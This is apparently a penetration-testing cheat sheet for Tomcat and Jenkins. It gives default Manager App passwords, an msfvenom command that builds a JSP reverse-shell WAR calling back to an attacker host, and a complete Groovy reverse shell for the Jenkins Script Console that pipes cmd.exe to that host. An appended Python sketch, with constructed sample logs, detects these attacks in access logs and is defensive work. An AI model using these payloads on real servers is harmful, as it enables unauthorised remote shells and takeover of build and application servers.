Tomcat & Jenkins

1. Tomcat (8080)

If you guess the Manager App password (admin:admin, tomcat:s3cret):

1. Create the payload:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<KALI> LPORT=443 -f war > shell.war
2. Upload: go to /manager/html, section "WAR file to deploy".
3. Execute: browse to http://<IP>:8080/shell.

2. Jenkins (8080)

Continuous integration. RCE by design.

1. Script Console: go to Combine -> Manage Jenkins -> Script Console.
2. Groovy reverse shell:

String host="<KALI>";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
3. Click "Run".
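
Both techniques above leave traces in HTTP access logs: repeated 401s on the Manager App followed by a POST to /manager/html/upload, and a POST to the Jenkins /script (or /scriptText) endpoint. The following detection sketch is an added example, not part of the original page; it assumes both services are logged in Common Log Format (Tomcat's AccessLogValve "common" pattern, or a reverse proxy in front of Jenkins), and the log lines, rule names and threshold are constructed for illustration.

```python
import re
from collections import Counter

# Assumed Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed sample lines (not taken from a real system).
SAMPLE = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - tomcat [01/Jan/2024:10:00:04 +0000] "GET /manager/html HTTP/1.1" 200 17820
10.0.0.5 - tomcat [01/Jan/2024:10:00:09 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19001
10.0.0.9 - admin [01/Jan/2024:11:00:00 +0000] "POST /script HTTP/1.1" 200 8123
10.0.0.7 - - [01/Jan/2024:11:05:00 +0000] "GET /index.jsp HTTP/1.1" 200 512
"""

def detect(log_text, guess_threshold=3):
    """Return a list of (rule, client, user, path) findings."""
    findings, failures = [], Counter()
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, user, method, target, status = m.groups()
        path = target.split("?", 1)[0].rstrip("/")
        if path.startswith("/manager") and status == "401":
            failures[client] += 1  # failed Manager App logins per client
            if failures[client] == guess_threshold:
                findings.append(("manager-auth-failures", client, user, path))
        elif method == "POST" and path == "/manager/html/upload" and status.startswith("2"):
            findings.append(("tomcat-war-deploy", client, user, path))
        elif method == "POST" and path.endswith(("/script", "/scriptText")):
            findings.append(("jenkins-script-console", client, user, path))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

WAR deployments and Script Console use also occur during legitimate administration, so treat hits as events to correlate with change records and source addresses rather than as confirmed compromise.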